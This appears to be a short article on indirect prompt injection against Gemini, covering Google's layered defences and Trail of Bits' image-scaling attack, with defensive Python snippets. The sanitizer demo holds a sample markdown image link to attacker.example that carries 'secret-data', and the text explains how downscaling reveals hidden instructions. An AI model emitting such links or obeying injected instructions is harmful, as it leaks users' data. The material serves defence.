Google is addressing the growing threat of indirect prompt injection attacks on generative AI systems, in which malicious instructions are hidden in external data sources, such as emails or documents the model retrieves, rather than in the user's direct prompt. Its layered security strategy for the Gemini platform includes advanced content classifiers, security thought reinforcement, markdown sanitization, user confirmation mechanisms, and end-user security notifications.
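Markdown sanitization is one of those layers: the model's rendered output is scrubbed so that an injected instruction cannot exfiltrate data through attacker-controlled links or images. The sketch below illustrates the general idea only; the allow-list, regex, and function names are assumptions for the example and not Google's implementation.

```python
import re

# Illustrative output-sanitization layer: strip markdown image tags that point
# at hosts outside an allow-list, so a prompt-injected response cannot leak
# data through attacker-controlled image URLs. Hypothetical example, not
# Google's code.
ALLOWED_HOSTS = ("example-trusted-cdn.com",)  # assumed allow-list

IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def sanitize_markdown(model_output: str) -> str:
    """Remove markdown images whose URL is not on the allow-list."""
    def _filter(match: re.Match) -> str:
        url = match.group("url")
        if any(url.startswith(f"https://{host}") for host in ALLOWED_HOSTS):
            return match.group(0)  # keep images from trusted hosts
        return "[image removed: untrusted source]"
    return IMAGE_PATTERN.sub(_filter, model_output)

if __name__ == "__main__":
    risky = "Summary done. ![x](https://attacker.example/leak?q=secret-data)"
    print(sanitize_markdown(risky))
```

In practice a filter like this would sit alongside the other layers, since no single measure is expected to stop prompt injection on its own.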
Security researchers at Trail of Bits have discovered that Google's Gemini tools are vulnerable to image-scaling prompt injection attacks, in which malicious prompts embedded in images can manipulate the AI's behavior. The attack exploits the downscaling step many pipelines apply before an image reaches the model: patterns that are effectively invisible at full resolution resolve into readable instructions once the image is resized, so the model processes text the user never saw. Google does not classify this as a security vulnerability because it relies on non-default configurations, but the researchers warn that such attacks could be used against AI systems if not properly mitigated. They recommend avoiding image downscaling in agentic AI systems and implementing systematic defenses against prompt injection.
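One practical mitigation in line with the researchers' advice is to surface the exact downscaled image the model will receive, so any text that only emerges at the reduced resolution is visible before an agent acts on it. The sketch below is a minimal illustration assuming a Pillow-based pipeline; the target size, resampling mode, and file names are assumptions, not details of Gemini's pipeline.

```python
from PIL import Image

# Assumed size a hypothetical pipeline resizes uploads to before inference.
MODEL_INPUT_SIZE = (768, 768)

def preview_model_view(path: str) -> Image.Image:
    """Return the image as the model would receive it after downscaling."""
    with Image.open(path) as img:
        # Bicubic resampling is one of the interpolation modes such attacks
        # target; previewing the result reveals any instructions that only
        # become legible at this scale.
        return img.convert("RGB").resize(MODEL_INPUT_SIZE, Image.Resampling.BICUBIC)

if __name__ == "__main__":
    preview = preview_model_view("upload.png")   # hypothetical uploaded image
    preview.save("what_the_model_sees.png")      # surface this to the user
    print("Review what_the_model_sees.png before the agent processes the image.")
```

Skipping downscaling entirely, as the researchers recommend where feasible, removes the mismatch between what the user reviews and what the model actually sees.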